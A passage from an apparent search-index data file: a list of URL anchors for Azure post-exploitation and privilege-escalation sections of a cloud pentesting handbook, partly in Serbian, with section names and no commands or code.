untssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---post-eksploatacija-funkcionih-aplikacija","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#post-eksploatacija-funkcionih-aplikacija","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#logic-apps-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#Референце","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#akcije-authorizationrules-slanje-i-primanje-poruka","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#reference","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---post-eksploatacija-tabele-skladišta","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#post-eksploatacija-tabele-skladišta","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-images","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#osetljive-informacije-u-tačkama-vraćanja","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#osetljive-informacije-na-diskovima-i-snimcima","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#osetljive-informacije-u-vm-ekstenzijama-i-vm-aplikacijama","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---eskalacija-privilegija","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#hybrid-workers-group","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#prilagođena-runtime-okruženja","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#kompromitovanje-konfiguracije-stanja","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#az---azure-container-instances-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#azure-container-instances","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#uloge","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#uloga-administrator-privilegovanih-uloga","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#aplikacije","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#service-principals","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-i-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#grupe","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicmembershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#dinamičke-grupe-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#korisnici","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#politike-uslovnog-pristupa-i-zaobilaženje-mfa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#uređaji","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#ostale-zanimljive-dozvole-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---politike-uslovnog-pristupa-i-mfa-zaobilaženje","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#osnovne-informacije","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#enumeracija","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#bypass-ovi-politika-uslovnog-pristupa","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#platforme-uređaja---uslov-uređaja","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#lokacije-zemlje-ip-opsezi---uslov-uređaja","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#cloud-aplikacije","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ostali-az-mfa-zaobilaženja","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ton-zvona","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#usklađeni-uređaji","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#alati","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#reference","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#osnovne-informacije","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#primer","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#reference","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#bucket-readwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#remote-debugging","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#promena-github-repozitorijuma","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#modify-network-restrictions","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfigli